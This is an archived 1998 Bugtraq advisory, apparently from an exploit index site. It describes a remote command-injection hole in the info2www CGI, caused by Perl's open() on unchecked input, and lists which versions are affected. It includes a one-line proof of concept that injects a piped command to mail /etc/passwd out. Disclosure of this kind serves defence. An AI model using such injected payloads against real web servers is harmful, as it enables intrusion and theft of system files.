info2www CGI hole

Summary
Description:Another dumb cgi blidnly using the (magical) perl open()
Author:Niall Smart <njs3@DOC.IC.AC.UK>
Compromise:execute arbitrary commands as web server's UID (remote)
Vulnerable Systems:Those running a vulnerable version of the info2www CGI
Date:3 March 1998
Details


Date: Tue, 3 Mar 1998 11:26:49 +0000
From: Niall Smart <njs3@DOC.IC.AC.UK>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerabilites in some versions of info2www CGI

Hi,

Some versions of the info2www CGI blindly open files:

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passw
d|)'
$
You have new mail.
$

Trying to track down which versions of info2www have this bug and which
don't has been difficult, there are lots of variants out there, some
of which aren't vulnerable.  Instead of trying to make a list of versions
which are vulnerable I'll just say that:

 - if it has no version number, its probably vulnerable
 - the uuencoded version at CPAN is corrupt, and the one
   which the README file tells you to get is vulnerable
 - version 1.1 is vulnerable
 - version 1.2.x seem ok (but I'm no perl expert)

Apparently info2www is based on info2html and infogate, so these may
have problems too.

Niall

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]